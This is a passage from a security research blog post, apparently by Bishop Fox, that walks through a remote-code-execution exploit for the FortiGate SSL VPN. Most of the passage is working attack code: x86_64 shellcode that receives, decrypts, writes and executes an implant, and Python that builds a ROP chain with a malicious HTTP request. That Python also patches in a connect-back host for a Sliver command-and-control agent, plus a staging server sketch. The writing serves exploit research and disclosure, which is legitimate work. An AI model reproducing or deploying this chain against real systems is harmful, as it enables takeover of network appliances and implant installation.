We used calloc to allocate a block of memory large enough to store the incoming encrypted implant data. Note that 0x3535353535353535 was a placeholder for the address of calloc in the PLT of the FortiGate /bin/init binary and was replaced at runtime by the exploit:

# calloc(size_of_encrypted_payload) 
        movabs $0x3535353535353535, %rax 
        movq   %r13,  %rdi 
        movq   $0x1,  %rsi 
        callq  *%rax

Now that the shellcode allocated a memory region large enough for the payload, we began the process of reading the encrypted implant data:

# read(2) X bytes of payload 
        movq   %r13,   %rdx                              # encrypted payload size in bytes 
        movq   %rbx,   %rdi                              # socket fd 
        movq   %rax,   %rsi                              # address of calloc()'d buffer 
        movq   %rsi,   %r12                              # save calculated payload address in r12 
        xorq   %rcx,   %rcx                              # flags = 0 
        movq   $0x0,   %r8                               # srcaddr = NULL 
        movq   $0x0,   %r9                               # addrlen = 0 
        xorq   %r10,   %r10                              # use r10 to track total bytes read so far 
 
        # rdi = fd 
        # rsi = storage ptr 
        # rdx = num bytes to read 
        # rcx = flags 
        # r8  = NULL 
        # r9  = 0 
        # rax = 0x2d ('recvfrom' syscall #) 
        # call: recvfrom(rdi, rsi, rdx, rcx, r8, r9)  
        # r13 = size of payload 
        # r11 = num bytes left to read (copied into rdx) 
_readloop:       
        movq   $0x2d,  %rax                              # recvfrom(2) syscall 
        syscall                                          # try to read rdx <size> bytes 
        cmpq   $-0x1,  %rax 
        jle _readfinished                                # abort on error 
        addq   %rax,  %r10                               # keep track of total bytes read                                
        addq   %rax,  %rsi                               # add num bytes just read to payload buffer address 
        movq   %r13,  %r11 
        subq   %r10,  %r11 
        movq   %r11,  %rdx 
        cmpq   %r10,  %r13                               # if we read all the bytes... 
        jg _readloop                                     # ...then exit the loop, otherwise read some more 
 
_readfinished:
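
For readers who find the loop easier to follow in a high-level language, here is a rough Python rendering of the same logic. It is a sketch, not a translation: recv stands for any callable that returns up to n bytes, and unlike the assembly it also stops on an empty read (peer closed the connection).

```python
import io


def read_exact(recv, total):
    """Keep calling recv() until `total` bytes have arrived.

    Mirrors _readloop: track the bytes read so far, ask only for what
    is still missing, and stop once the full payload has been received.
    """
    buf = bytearray()
    while len(buf) < total:
        chunk = recv(total - len(buf))   # rdx = bytes left to read
        if not chunk:                    # error or closed connection
            break
        buf += chunk                     # advance the write position
    return bytes(buf)


# Simulate a socket that delivers at most 3 bytes per call.
source = io.BytesIO(b"abcdefghij")
received = read_exact(lambda n: source.read(min(n, 3)), 10)
print(received)
```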

Now that the entire encrypted data blob was read, the shellcode wrote an "all clear" message to the exploit to let it know what stage it was at:

# we have finished reading the payload. 
        # write(0xbf) goodbye response to the stager. 
        movq   %rsp,   %rsi                             # source buffer is in rsi 
        addq   $0x8,   %rsi                             # clobber the start of the shellcode nop sled, who cares 
        movabs $0x3838383838383838, %rax 
        movq   %rax,  (%rsi)                            # response contains whatever the exploit patched in here. 
        movq   %rbx,   %rdi                             # socket fd -> rdi 
        movq   $0x8,   %rdx                             # payload len = 8 bytes 
        movq   $0x1,   %rax                             # write(2) syscall 
        syscall                                         # send the "all clear" to the exploit

The socket was then closed, and we no longer needed to talk to the exploit. We ran autonomously.

# close the socket 
        movq   %rbx,   %rdi                             # socket fd -> rdi 
        movq   $0x3,   %rax                             # close(2) 
        syscall                                         # close the socket
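
Seen from the exploit's side, the whole conversation is short: receive the 8-byte hello, send a 4-byte length followed by the encrypted blob, and receive the 8-byte completion message. The sketch below shows one way to implement it. The function name serve_stage is ours, and the little-endian encoding of the length is an assumption based on how the shellcode loads the value from memory on x86_64.

```python
import socket
import struct


def serve_stage(conn, token, blob):
    """Run the exploit side of the staging handshake on a connected socket.

    conn:  connected TCP (or other stream) socket from the shellcode
    token: the 8-byte value patched into the shellcode
    blob:  the encrypted implant bytes
    """
    if conn.recv(8, socket.MSG_WAITALL) != token:
        raise ValueError("unexpected hello token")
    # 4-byte length (assumed little-endian), then the encrypted payload.
    conn.sendall(struct.pack("<I", len(blob)) + blob)
    if conn.recv(8, socket.MSG_WAITALL) != token:
        raise ValueError("unexpected completion token")
    return True
```

In the listings above, both messages use the same 0x3838383838383838 placeholder, which is why a single token is compared twice.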

This piece of code took the randomly generated AES key (which, like most other things, is patched into the shellcode at runtime) and used it to decrypt the blob we just received from the exploit:

# at this point we have the encrypted payload in memory. R12 is a pointer. 
        # create another pointer:  
        # r14 -> buffer for decrypted payload (re-use the encrypted buffer!) 
        movq   %r12,   %r14 
         
        # r15 -> AES_key struct (244 bytes, but allow more) 
        movq   %rsp,   %rdx 
        subq   $0x200, %rdx 
        movq   %rdx,   %r15 
 
        # r10 -> actual AES key (16 bytes) 
        subq   $0x10,  %rdx 
        movq   %rdx,   %r10 
 
        # r11 -> iv 
        subq   $0x10,  %rdx 
        movq   %rdx,   %r11 
 
        # reminder of things in callee-saved regs at this stage: 
        #  r12 = ptr to encrypted payload 
        #  r13 = length of encrypted payload 
        #  r14 = ptr to buffer for decrypted payload 
        #  r15 = OpenSSL AES_key struct 
        # and caller-saved: 
        #  r10 = AES key 
        #  r11 = iv 
 
        # These placeholders will be patched by the exploit at runtime. 
        # The patched bytes are a one-time-use 128-bit AES key used by the exploit  
        # to encrypt the payload we just received. We’ll decrypt it next. 
        # First let’s push the 16-byte key onto the stack. 
        movabs $0x3030303030303030, %rax 
        movq   %r10,   %rdx 
        movq   %rax,   (%rdx)                      
        movabs $0x3131313131313131, %rax 
        movq   %rax,   0x8(%rdx, 1) 
 
        # put the IV adjacent to the AES key on the stack 
        movabs $0x0,   %rax 
        movq   %r11,   %rdx 
        movq   %rax,   (%rdx) 
        movq   %rax,   0x8(%rdx, 1) 
 
        # setup and call OpenSSL’s AES_set_decrypt_key() 
        movq   %r10,   %rdi                             # ptr to AES key bytes 
        movq   $0x80,  %rsi                             # 128 (0x80) bits 
        movq   %r15,   %rdx                             # AES_key struct address 
        movabs $0x3333333333333333, %rax                # replaced at runtime with real GOT address 
        movq   %rax,   %rcx                             # address of AES_set_decrypt_key() 
        movq   %rsp,   %rbx 
        addq   $0x4000,%rsp 
        callq  *%rcx 
        movq   %rbx,   %rsp 
 
        # setup and call OpenSSL’s AES_cbc_encrypt() 
        movq   %r12,   %rdi                             # encrypted data 
        movq   %r14,   %rsi                             # buffer for decrypted data 
        movq   %r13,   %rdx                             # encrypted data length 
        movq   %r15,   %rcx                             # OpenSSL AES_key struct  
        movq   %r15,   %r8                               
        subq   $0x20,  %r8                              # iv 
        movq   $0x0,   %r9                              # AES_DECRYPT 
        movabs $0x3434343434343434, %rax                # AES_cbc_encrypt() 
        movq   %rsp,   %rbx 
        addq   $0x4000,%rsp 
        callq  *%rax 
        movq   %rbx,   %rsp
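
The placeholder immediates in the listing above (0x3030303030303030, 0x3131313131313131, and so on) are easy to find in the assembled shellcode because each one is eight identical ASCII bytes. The following is a minimal sketch of that patching idea, not the exploit's actual code: the helper name patch_placeholder, the two-instruction stub, and the fixed key are all illustrative assumptions.

```python
def patch_placeholder(shellcode, marker, value):
    """Swap one 8-byte marker for an 8-byte value, refusing ambiguous patches."""
    if len(marker) != len(value):
        raise ValueError("marker and value must be the same length")
    if shellcode.count(marker) != 1:
        raise ValueError("expected exactly one %r marker" % marker)
    return shellcode.replace(marker, value)

# "movabs $imm64, %rax" encodes as 48 b8 followed by the 8-byte immediate,
# so $0x3030303030303030 shows up in the object code as the ASCII "00000000".
MOVABS_RAX = bytes.fromhex("48b8")
stub = MOVABS_RAX + b"0" * 8 + MOVABS_RAX + b"1" * 8

key = bytes(range(16))  # stand-in for a randomly generated 128-bit key

patched = patch_placeholder(stub, b"00000000", key[0:8])
patched = patch_placeholder(patched, b"11111111", key[8:16])
```

Checking that each marker occurs exactly once guards against a patch silently landing in the wrong place, or in more than one place, if the shellcode changes.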

At this point the implant has been decrypted in memory, so it's time to write it to disk:

# write the cleartext payload to disk 
 
        # open("/tmp/x", O_CREAT | O_RDWR) 
        movabs $0x00782f706d742f, %rax                  # /tmp/x\x00 
        movq   %rsp,   %rdi                             # stack ptr -> rdi 
        subq   $0x8,   %rdi                             # we'll place filename at rsp-8 
        movq   %rax,   (%rdi)                           # store filename on stack at rsp-8 
        movq   $0x42,  %rsi                             # O_CREAT | O_RDWR 
        movq   $0x1ff, %rdx                             # 0777 & ~umask (022) = 0755 = executable by all 
        movq   $0x2,   %rax                             # open(2) 
        syscall                                         # open("/tmp/x", O_CREAT | O_RDWR, 0777); 
 
        # write(payload) to "/tmp/x" 
        # The value 0x3232323232323232 will be patched at runtime by the exploit and  
        # contains the real length of the payload, not the padded length used for AES CBC. 
        movq   %rax,   %rdi                             # /tmp/x fd -> rdi 
        movq   %rax,   %r13                             # save a copy of the fd 
        movq   %r14,   %rsi                             # decrypted payload address -> rsi 
        movabs $0x3232323232323232, %rax                # payload len -> rdx 
        movq   %rax,   %rdx 
        movq   $0x1,   %rax                             # write(2) syscall 
        syscall                                         # write payload to /tmp/x 
         
        # close "/tmp/x"                                 
        movq   %r13,   %rdi                             # file fd -> rdi 
        movq   $0x3,   %rax                             # close(2) 
        syscall                                         # close the /tmp/x file descriptor
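
Two lengths are in play in the listings above: the padded length handed to AES_cbc_encrypt() and the real length written to /tmp/x. The sketch below illustrates the difference. It assumes zero-byte padding up to the 16-byte AES block size, which the original does not specify, and the helper name pad_to_block and the sample payload are hypothetical.

```python
AES_BLOCK = 16

def pad_to_block(payload, block=AES_BLOCK):
    """Zero-pad payload up to the next multiple of the cipher block size."""
    remainder = len(payload) % block
    if remainder == 0:
        return payload
    return payload + b"\x00" * (block - remainder)

payload = b"\x7fELF" + b"A" * 33    # 37-byte stand-in for the implant
padded = pad_to_block(payload)

real_length = len(payload)          # what gets patched over 0x3232323232323232
padded_length = len(padded)         # what the CBC decryption operates on
```

Writing only real_length bytes to disk drops the padding, so the file on the appliance matches the original payload byte for byte.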

The last stage is to execute the payload via the execve syscall:

# call execve() 
        movabs $0x00782f706d742f, %rax                  # /tmp/x\x00 
        movq   %rax,   (%r12)                           # "/tmp/x\x00" into mem @ r12 (same buffer as r14) 
        movq   %r12,   %rdi                             # address of /tmp/x into rdi 
        movq   $0x0,   %rsi 
        movq   $0x0,   %rdx 
        movq   $0x3b,  %rax                             # execve syscall 
        syscall
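
The constant 0x00782f706d742f used in both listings is simply the string "/tmp/x" plus NUL terminators, read as a 64-bit little-endian integer. A short worked example follows, which also checks the open(2) flag and mode arithmetic. The helper name path_to_imm64 is hypothetical, and the flag values are the Linux x86-64 ones.

```python
import struct

def path_to_imm64(path):
    """Pack a short path into the 64-bit little-endian immediate used by movabs."""
    if len(path) > 7:
        raise ValueError("path plus its NUL terminator must fit in 8 bytes")
    return struct.unpack("<Q", path.ljust(8, b"\x00"))[0]

imm = path_to_imm64(b"/tmp/x")

O_RDWR, O_CREAT = 0x2, 0x40     # Linux x86-64 values
flags = O_CREAT | O_RDWR        # the 0x42 loaded into rsi
mode = 0o777 & ~0o022           # effective permissions, assuming a umask of 022
```

Because the path must fit in one register together with its terminator, this trick only works for paths of seven bytes or fewer.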

We're good netizens, so we exited the child process cleanly to avoid a crash. The FortiGate firewall has a watchdog that restarts dead processes automatically, and things tidy themselves up after this part is complete.

_final: 
        # call _exit()                                  # exit cleanly. The watchdog restarts sslvpnd. 
        movq   $0xe7,  %rax                             # exit_group(2) 
        xorq   %rdi,   %rdi                             # exit status 0 
        syscall 
 
####### EOF is never reached ########

A Quick Recap

At this stage we've covered:

  • The bug
  • The PoC / trigger
  • The stages of the exploit
  • Obtaining the necessary addresses
  • A little bit on ROP
  • Writing shellcode

The glue that held all this together was the ROP chain. We used a lightweight Python class to simplify its construction.

Create a ROP Chain

Take a look at how we built a ROP chain:

rop.clear_gadget_chain()

req = bytearray(b"") 
req  += b"POST /remote/logincheck?magic=aaa HTTP/1.1\r\nHost: " + self.host.encode() + b": " + str(self.port).encode() + b"\r\nContent-Length: " + CONTENT_LENGTH + b"\r\nUser-Agent: AAAAAAAAAAAAAAAA\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n\r\n" 
 
# Just padding the start of the ROP buffer 
rop.add_padding(HEAD_PAD_LENGTH-2)    # this is of no consequence 
 
# Stage 2 - The stack pivot gadget dumps us here. 
# Stage 2.5 - "slide" down the stack by popping RETs 
# Then hit an "add rsp, 0x18" to add 0x18 (24) bytes to $rsp. 
# We do this to "jump over" the stack pivot gadget and land in ~ 100kb of space that we control. 
# Not all platforms will give us an "add rsp, 0x18" gadget, but we might get "add rsp, xxx", so 
# we use RET to get us right up to the pivot and then jump over it using whatever gadget we can. 
# We land in another RET sled to account for not knowing the jump size in advance. 
rop.add_gadget("ret;", 23) 
rop.add_gadget("add rsp, 0x18; ret;")      
 
# Stage 1 - Entry point of the ROP chain. 
#  
# The exploit sets $rip to the address of STACK_PIVOT_GADGET then RETs to stage 2, above. 
# This part will be jumped over by stage 2.5, above. 
rop.add_gadget("push rdx; adc byte [rbx + 0x41], bl; pop rsp; pop rbp; ret;") # Entry point: overwrite rip with the stack pivot gadget. 
 
# Stage 3 - RET sled 
#  
rop.add_gadget("ret;", 32)              # RET sled consists of 32 RET instructions 
 
# Stage 4 - Calculate aligned memory page for stack address 
rop.add_gadget("pop rax; ret;") 
rop.add_immediate(0xfffffffffffff000) 
 
rop.add_gadget("and rax, rdi; ret;") 
rop.add_gadget("pop rbx; ret;") 
rop.add_gadget("add rsp, 0x18; ret;") 
 
rop.add_gadget("mov rdi, rax; call rbx;") 
rop.add_gadget("ret;", 8) 
 
rop.add_gadget("pop rsi; ret;") 
rop.add_immediate(MEM_LEN) 
 
rop.add_gadget("pop rdx; ret;") 
rop.add_immediate(PROT_RWX) 
 
rop.add_gadget("pop rax; ret;") 
rop.add_gadget("mprotect") 
 
rop.add_gadget("jmp rax;") 
 
# Stage 7 - NOP/RET sled, then JMP to stack address. 
# At this point our ROP payload/stack is executable. Shellcode follows. 
rop.add_gadget("ret;", 8) 
rop.add_gadget("jmp rsp;")  
rop.add_immediate(0x9090909090909090, 8) 
 
# build and convert the shellcode 
#run( [ 'as', '-o', 'shellcode.o', 'shellcode.s' ], check=True ) 
result = run("objdump -d -M intel shellcode.o |egrep '^...[a-z0-9]:' |cut -c 7-28|tr -d '\\n'|tr -d ' '|tr -d '\\t'|xxd -r -p", shell=True, capture_output=True) 
shellcode = result.stdout 
 
# patch in the relevant AES key for payload decryption 
shellcode = shellcode.replace(b"00000000", self.AES_key[0:8]) 
shellcode = shellcode.replace(b"11111111", self.AES_key[8:16]) 
 
# we need to know the real length of the payload file before padding 
shellcode = shellcode.replace(b"22222222", struct.pack("<Q", self.payload_length)) 
 
# fix up GOT function addresses in the shellcode 
shellcode = shellcode.replace(b"33333333", struct.pack("<Q", rop.get_address("AES_set_decrypt_key"))) 
shellcode = shellcode.replace(b"44444444", struct.pack("<Q", rop.get_address("AES_cbc_encrypt"))) 
shellcode = shellcode.replace(b"55555555", struct.pack("<Q", rop.get_address("calloc"))) 
 
# patch in the model # of the device we're brute-forcing so that the ping-back tells us  
# which payload worked 
null_len = 8 - len(hw_version) # assumption breaks if strlen(hw_version) > 7 
patch = hw_version + "\x00"*null_len 
shellcode = shellcode.replace(b"88888888", patch.encode()) 
 
# patch in the operator's connect-back port and IP 
shellcode = shellcode.replace(b"XXXXXX", struct.pack(">H", self.connectBackPort ) + self.ip_as_bytes(self.connectBackHost)) 
 
# shellcode gets tacked onto the end of the 8-byte NOP sled 
rop.add_bytes(shellcode)         
 
# sprinkle liberally with 4MB of padding 
rop.add_padding(PADDING_LEN) 
req += rop.bytes()
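
Stage 4 in the listing above exists because mprotect(2) requires a page-aligned start address: the chain masks the pointer in rdi with 0xfffffffffffff000 before the call. The arithmetic can be sketched as follows. The sample address and the mem_len value are hypothetical, and PROT_RWX is assumed to be the usual read/write/execute combination since the listing does not show its definition.

```python
PAGE_SIZE = 0x1000
PAGE_MASK = 0xfffffffffffff000                     # immediate popped into rax in Stage 4
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4   # Linux mprotect(2) flags

def page_align(addr):
    """Round an address down to the start of its 4 KiB page (and rax, rdi)."""
    return addr & PAGE_MASK

def region_covers(aligned, length, addr):
    """True if [aligned, aligned + length) still contains the original address."""
    return aligned <= addr < aligned + length

stack_addr = 0x7ffd1234abcd                        # hypothetical value of rdi
aligned = page_align(stack_addr)
prot_rwx = PROT_READ | PROT_WRITE | PROT_EXEC      # assumed meaning of PROT_RWX
mem_len = 0x10000                                  # hypothetical stand-in for MEM_LEN
```

Rounding down moves the start of the region below the original pointer, so the length has to be generous enough to still cover the shellcode that follows it.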

We tried to keep ROP chain construction simple: methods such as add_gadget and add_immediate append gadget addresses and 8-byte little-endian immediate values to the chain.
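
To make the idea concrete, here is a minimal sketch of what such a builder class could look like. It is not the class used in the exploit: the gadget table, its addresses, and the interpretation of the second argument as a repeat count are assumptions made for illustration.

```python
import struct

class RopChain:
    """Toy ROP-chain builder: maps gadget text to addresses and packs 8-byte words."""

    def __init__(self, gadgets):
        self.gadgets = gadgets          # e.g. {"ret;": 0x401016}
        self.chain = bytearray()

    def clear_gadget_chain(self):
        self.chain.clear()

    def get_address(self, name):
        return self.gadgets[name]       # KeyError if the gadget is unknown

    def add_gadget(self, name, count=1):
        # Append the gadget's address as a little-endian qword, count times.
        self.chain += struct.pack("<Q", self.get_address(name)) * count

    def add_immediate(self, value, count=1):
        # Append a raw 64-bit value that a preceding "pop" gadget will consume.
        self.chain += struct.pack("<Q", value) * count

    def add_padding(self, length, fill=b"A"):
        self.chain += fill * length

    def add_bytes(self, data):
        self.chain += data

    def bytes(self):
        return bytes(self.chain)

# Hypothetical gadget addresses, for illustration only.
rop = RopChain({"ret;": 0x401016, "pop rax; ret;": 0x40101a})
rop.clear_gadget_chain()
rop.add_gadget("ret;", 2)
rop.add_gadget("pop rax; ret;")
rop.add_immediate(0xfffffffffffff000)
chain = rop.bytes()
```

Keying gadgets by their disassembly text keeps the chain readable and lets the same chain definition be reused with a different address table for each firmware build.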

The general gist of this code is that the buffer req is populated with:

  • HTTP request line and headers, including the trigger for the exploit (malicious Content-Length header)
  • HTTP POST body, made up of the remaining items
  • New function pointer address that points at our stack pivot gadget
  • ROP chain
  • Shellcode

Having completed the exploit payload, we sent the req buffer to the SSL VPN's HTTP service. This triggered the bug immediately, causing the service to run the shellcode, download the implant, and connect the Sliver agent to our C&C infrastructure.

Conclusion

We hope this blog offers a unique perspective by sharing the rough outline of how to create an exploit for a single software/hardware version of FortiGate. Our goal is to add deeper layers of analysis to the existing security community resources mentioned above. We look forward to sharing additional analysis techniques from our continued discovery efforts against FortiGate security appliances in the future.


About the author, Carl Livitt

Bishop Fox Alumnus

Carl Livitt is a Bishop Fox alumnus. He was a Principal Researcher at Bishop Fox with decades of experience in mobile and application security, hardware and embedded devices, reverse engineering, and global-scale penetration testing.

Carl is credited with the discovery of many vulnerabilities within both commercial and open-source software. He was brought in as a third-party expert to lead the team that confirmed several security issues with St. Jude Medical implantable devices. His work eventually led to an official communication from the FDA.

Carl has served as a contributing author to Hacking Exposed Web Applications 3rd Edition as well as a technical advisor for Network Security Assessment 1st Edition. He has been interviewed on NPR and quoted in publications including USA Today and eWeek. Carl co-authored the iOS reverse engineering framework iSpy, which was featured at Black Hat USA's Tools Arsenal.

About the author, Jon Williams

Senior Security Engineer

As a researcher for the Bishop Fox Capability Development team, Jon spends his time hunting for vulnerabilities and writing exploits for software on our customers' attack surface. He previously served as an organizer for BSides Connecticut for four years and most recently completed the Corelan Advanced Windows Exploit Development course. Jon has presented talks and written articles about his security research on various subjects, including enterprise wireless network attacks, bypassing network access controls, and malware reverse engineering.
